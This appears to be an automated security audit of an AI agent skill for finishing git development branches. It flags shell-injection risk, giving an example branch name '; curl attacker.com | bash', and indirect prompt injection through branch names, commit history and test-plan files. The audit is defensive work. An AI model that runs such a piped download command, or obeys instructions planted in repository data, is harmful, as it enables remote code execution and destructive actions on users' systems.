finishing-a-development-branch
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill performs direct shell interpolation of variables like and across multiple steps. A malicious actor could craft a branch name containing shell metacharacters (e.g., ; curl attacker.com | bash) to achieve remote code execution when the agent executes git commands in Step 4 and Step 6.
- INDIRECT_PROMPT_INJECTION (HIGH): The skill ingests untrusted data from the local environment and uses it to drive high-privilege operations. 1. Ingestion points: Branch names, commit history, and the contents of docs/test-plans/ files. 2. Boundary markers: None are present to prevent the agent from interpreting embedded instructions in branch metadata or documentation. 3. Capability inventory: Destructive git operations (delete), network operations (git push, gh pr create), and arbitrary code execution via project test suites. 4. Sanitization: No validation or escaping is performed on environmental data before shell execution or subagent invocation.
- EXTERNAL_DOWNLOADS (LOW): The skill performs git pull and git push operations. While these are necessary for the skill's purpose, they involve interaction with remote servers that could host malicious content.
Recommendations
- AI detected serious security threats
Audit Metadata